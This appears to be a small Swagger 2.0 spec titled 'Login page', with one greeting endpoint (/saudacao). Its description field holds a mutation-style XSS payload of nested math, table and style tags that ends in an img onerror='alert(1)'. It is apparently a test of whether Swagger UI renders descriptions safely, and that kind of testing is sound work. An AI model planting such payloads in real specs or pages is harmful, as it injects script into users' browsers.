swagger: '2.0'
info:
  title: Login page
  description: |
    <math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${</style>}<foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b></a></table></li></mi></foo-test></math>
  version: 1.0.0
paths:
  /saudacao:
    get:
      summary: Retorna uma mensagem de boas-vindas.
      produces:
        - application/json
      responses:
        '200':
          description: Sucesso
          schema:
            type: object
            properties:
              mensagem:
                type: string
                example: "Olá, mundo!"